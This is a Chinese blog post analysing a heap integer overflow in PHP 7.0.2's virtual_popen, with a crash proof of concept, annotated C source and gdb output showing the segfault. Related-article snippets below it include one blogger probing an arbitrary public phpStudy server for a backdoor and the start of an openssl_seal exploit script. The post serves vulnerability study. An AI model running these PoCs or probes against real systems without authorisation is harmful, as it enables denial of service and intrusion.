php漏洞挖掘与修复 英文版,[原创]PHP 7 漏洞挖掘系列之二:Heap-based integer overflow...

最新推荐文章于 2021-03-27 10:13:27 发布
最新推荐文章于 2021-03-27 10:13:27 发布
阅读量183 收藏
点赞数
文章标签: php漏洞挖掘与修复 英文版

0x01 前言

这个漏洞是玄武实验室的人挖出来的,我这边做一下分享吧。我们不是漏洞挖掘者,只是漏洞搬运者。好了,进入正题吧,这篇文章主要讲述的是基于堆的整数溢出,找了好久终于找到一个比较简单易懂的漏洞进行分析。

0x02 漏洞分析

首先放poc:<?php

ini_set('memory_limit', -1);

$cmd = str_repeat("/", 0xfffffff0);

system($cmd);

这段代码看起来非常简单,假如内存不够的话,运行这段代码会报out of memory错误,poc中的system函数可以替换其它命令执行函数,只要是调用了virtual_popen这个函数就可以。下面先看关键代码:#else /* Unix */

CWD_API FILE *virtual_popen(const char *command, const char *type) /* {{{ */

{

int command_length;  //int型的长度在32位中为0x7fffffff

int dir_length, extra = 0;

char *command_line;

char *ptr, *dir;

FILE *retval;

command_length = strlen(command);  //这里统计命令的字符串长度,

dir_length = CWDG(cwd).cwd_length;

dir = CWDG(cwd).cwd;

while (dir_length > 0) {

if (*dir == '\'') extra+=3;

dir++;

dir_length--;

}

dir_length = CWDG(cwd).cwd_length;//脚本路径的长度

dir = CWDG(cwd).cwd;

ptr = command_line = (char *) emalloc(command_length + sizeof("cd '' ; ") + dir_length + extra+1+1);  //这边变成了emalloc(0),等会看调试信息

if (!command_line) {

return NULL;

}

memcpy(ptr, "cd ", sizeof("cd ")-1);

ptr += sizeof("cd ")-1;

if (CWDG(cwd).cwd_length == 0) {

*ptr++ = DEFAULT_SLASH;

} else {

*ptr++ = '\'';

while (dir_length > 0) {

switch (*dir) {

case '\'':

*ptr++ = '\'';

*ptr++ = '\\';

*ptr++ = '\'';

/* fall-through */

default:

*ptr++ = *dir;

}

dir++;

dir_length--;

}

*ptr++ = '\'';

}

*ptr++ = ' ';

*ptr++ = ';';

*ptr++ = ' ';

memcpy(ptr, command, command_length+1);  //这里在转换的时候负数变成正数,大于申请的堆空间,所以复制后造成溢出

retval = popen(command_line, type);

efree(command_line);

return retval;

}

这段代码在zend_virtual_cwd.c的1853行,可以看出是unix环境使用的函数。这个函数是执行命令的底层调用函数,具体我就不往上找了麻烦,从代码中就可以大致看的出来。php执行命令的函数还是挺多的,我就不列举了,在poc中我用的是system函数。具体原因请看代码注释。

如果这样还不明白的话,可以看gdb调试信息:root@mhn:~# gdb -q --args php-7.0.2/sapi/cli/php -n test.php

Reading symbols from php-7.0.2/sapi/cli/php...done.

(gdb) b zend_virtual_cwd.c:1873

Breakpoint 1 at 0x84d8b4: file /root/php-7.0.2/Zend/zend_virtual_cwd.c, line 1873.

(gdb) b zend_virtual_cwd.c:1904

Breakpoint 2 at 0x84d979: file /root/php-7.0.2/Zend/zend_virtual_cwd.c, line 1904.

(gdb) r

Starting program: /root/php-7.0.2/sapi/cli/php -n test.php

[Thread debugging using libthread_db enabled]

Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, virtual_popen (

command=command@entry=0x7ffef1200018 '/' ...,

type=type@entry=0xae66bb "r") at /root/php-7.0.2/Zend/zend_virtual_cwd.c:1873

1873ptr = command_line = (char *) emalloc(command_length + sizeof("cd '' ; ") + dir_length + extra+1+1);

(gdb) p command_length

$1 = -16

(gdb) p sizeof("cd '' ; ")

$2 = 9

(gdb) p dir_length

$3 = 5

(gdb) p extra

$4 = 0    //可以看到这边加起来为0,其实这样比较容易理解。

(gdb) c

Continuing.

Breakpoint 2, virtual_popen (

command=command@entry=0x7ffef1200018 '/' ...,

type=type@entry=0xae66bb "r") at /root/php-7.0.2/Zend/zend_virtual_cwd.c:1904

1904memcpy(ptr, command, command_length+1);

(gdb) p command_length+1

$5 = -15

(gdb) n

Program received signal SIGSEGV, Segmentation fault.

__memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:152

152../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory.

我想看到这里也看明白了,正是因为command_length的类型为int,后面再malloc和memcpy中又转化size_t类型,然后造成整数溢出。这个漏洞我感觉是最容易理解。exp我现在还不咋会写,等后续可能会学习一下怎么在实际漏洞中的编写。容我吹个牛逼,要不是有人先发现了,我觉的这个漏洞发现者会是。。。

0x03 小结

虽然这篇文章我老早就写好了,但是到现在还没明白,关于php的内存管理机制,不过本文不用理解那些东西,到后面的UAF就需要有很深的了解,所以到现在我还没明白php的UAF的原理与利用。欢迎加我QQ 499671216一起讨论。如果本章内容讲解错误,欢迎指出。

参考链接:

何为浮云
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php漏洞挖掘修复 英文版,记一次PHPstudy漏洞挖掘过程
weixin_29629231的博客
03-11 104
今天有点烦躁,所以得找点事刺激一下于是,公网上搜了一个PHPstudy的站测试payload看看有没有漏洞,果然、存在漏洞看一下目录GET /phpinfo.php HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40...
堆优化器(Heap-Based Optimizer, HBO)
qq_18823753的博客
10-29 920
HBO将CRH思想映射分为四个步骤: 1. 对公司等级制度(CRH)进行建模; 2. 对下属与直属上司之间的互动进行数学建模; 3. 对同事之间的互动进行数学建模; 4. 雇员为完成某项任务而作出的贡献。
__memcpy_sse2_unaligned - what does this mean in detail?
gonaYet的博客
08-09 4517
背景: 出现段错误,展示出错位置在__memcpy_sse2_unaligned 原因: 一般这个原因是由于拷贝的memcpy拷贝的两个地址中出现了无效地址 我出现的问题: address + offsset 而offset是由int数值进行计算得到的, 由于其中有些int值很大,那么相乘最大可能为2^32 * 2^32 = 2^64是会出现超过int的容量的, 这
php7.2.0 漏洞,N/A Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution-漏洞情报...
weixin_39758392的博客
03-27 609
// Source: http://akat1.pl/?id=1function get_maps() {$fh = fopen("/proc/self/maps", "r");$maps = fread($fh, 331337);fclose($fh);return explode("\n", $maps);}function find_map($sym) {$addr = 0;foreach(...
memcpy_sse:使用SSE2 loadstore instrinsics的memcpy()
05-17
memcpy_sse 使用SSE2加载/存储内部指令的memcpy()。 与VC ++一起为32位编译时,它的性能优于memcpy()。 当为64位编译时,它的性能与memcpy()相同,因为所有x86-64芯片都支持SSE,因此memcpy()已被实现。 在Linux上,无论是32位还是64位,它似乎都比memcpy()更快。 32位Linux: g++ memcpy_test.cpp -o memcpy_test -O2 -msse2 64位Linux: g++ memcpy_test.cpp -o memcpy_test -O2
算法设计与分析:3-Lec7-Heap.pdf
09-19
算法设计与分析:3-Lec7-Heap.pdf
api-ms-win-core-heap-l2-1-0.dll(32+64位都有)亲测可用
03-02
《api-ms-win-core-heap-l2-1-0.dll:操作系统核心堆管理库解析》 在Windows操作系统中,`api-ms-win-core-heap-l2-1-0.dll`是一个至关重要的动态链接库文件,它是系统核心堆管理的一部分,用于32位和64位系统。该...
api-ms-win-core-heap-l2-1-0(64-Bit).zip
11-27
《深入理解API-MS-WIN-CORE-HEAP-L2-1-0.dll:64位系统的内存管理关键组件》 在Windows操作系统中,API-MS-WIN-CORE-HEAP-L2-1-0.dll是核心堆管理库的一个重要组成部分,主要负责64位系统中的内存分配和管理。这个...
api-ms-win-core-heap-l2-1-0.zip
05-28
标题中的"api-ms-win-core-heap-l2-1-0.zip"是一个压缩包文件,它包含了一个名为"api-ms-win-core-heap-l2-1-0.dll"的动态链接库(DLL)文件以及一个"说明.txt"的文本文件。这个压缩包主要是为了解决系统中缺失"api-...
api-ms-win-core-heap-l2-1-0.dll (64位)
08-14
《API-MS-WIN-CORE-HEAP-L2-1-0.DLL:64位Windows 10系统的关键组件》 在计算机操作系统中,动态链接库(DLL)是实现功能模块化的重要部分,它们允许多个程序共享同一段代码和数据,节省内存并提高效率。"api-ms-...
popen初识
jc_benben的专栏
05-23 500
# 当我们也需要外部程序的输出输入信息进行处理的时候,os.system()就不够用了。Python另外有popen2模块,可 以让我们管理外部程序子进程的输出输入管道(pipe)。 # 在popen2模块里有popen2(),popen3()和popen4()三个工具函数,分别会重导向子进程的标准输出输入、 标准输出输入及错误输出、标准输出合并错误输出及标准输入。 # >>> impor
SSE2 memcpy
奋斗中拥有
04-17 4332
SSE2 memcpy By Kaetemi on Sunday 25 October 2009, 17:56 - Articles - Permalink asm code memcpy nel programming sse2 SSE2 provides functionality for performing faster on aligned memory. By cop
memcpy-avx-unaligned/strcpy_sse2_unaligned崩溃记录
柳鲲鹏
03-03 7857
  使用gdb看到崩溃内容: #0 __memcpy_avx_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:273 273 ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S: 没有那个文件或目录. [Current thread is 1 (T...
内存未对齐(Unaligned access mips sh4linux QtWebkit)导致性能降低及其处理
04-19 4244
内存未对齐是指cpu要读取N字节数据,但数据的起始地址不能被N所整除,导致效率降低,甚至异常的出现。例如当cpu读取一个int类型的变量,而变量地址是0x10005的时候就产生未对齐访问。 自然对齐:     N字节的数据类型需要放在起始地址为被N整除的地址这称为自然对齐。并不是所有体系结构的计算机带都要求自然对齐,有的可以指定对齐方式。但是为了达到好的可移植性编写代码的时候最好都用自然对齐方
问题分析及记录../sysdeps/x86_64/multiarch/../memcpy.S: 没有那个文件或目录.
热门推荐
Chasing_Chasing的博客
08-30 1万+
在Linux的项目开发中,今天运行程序时出现:./sysdeps/x86_64/multiarch/../memcpy.S:没有文件或目录错误。该程序是进行人脸检测的,其有用到gtk、sdl库,因为我虚拟机已经有sdl2版本的库,所以很快就编译过了,但是运行却出错了,段错误。 折腾了一下,先是百度搜索,看到说一般不是因为缺少该文件,而是因为memcpy操作时可能数组溢出、或者空指针问题,然后我用...
addresssanitizer: heap-buffer-overflow on address
最新发布
03-16
addresssanitizer: heap-buffer-overflow on address的意思是在地址上发生了堆缓冲区溢出。这通常是由于程序试图访问超出分配给它的内存范围的数据而导致的。这可能会导致程序崩溃或产生不可预测的行为。要解决此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值